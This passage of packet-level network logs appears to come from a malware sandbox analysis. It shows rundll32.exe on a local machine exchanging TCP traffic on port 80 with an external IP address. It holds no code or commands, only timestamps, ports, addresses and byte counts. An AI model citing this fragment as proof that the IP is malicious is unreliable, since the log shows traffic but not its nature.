Apr 23, 2022 08:12:21.633529902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633569956 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633608103 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.633611917 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633641005 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633642912 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.633676052 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.633807898 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.633879900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.634663105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634686947 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634720087 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634740114 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634771109 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634840965 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634877920 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.634882927 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634923935 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634951115 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.634975910 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.635148048 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.823791981 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.847484112 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:22.199361086 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:22.199390888 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:22.199438095 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:22.199506998 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:13:14.888428926 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49766 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 23, 2022 08:12:19.910176992 CEST | 1224 | OUT | |
Apr 23, 2022 08:12:20.288152933 CEST | 1238 | IN |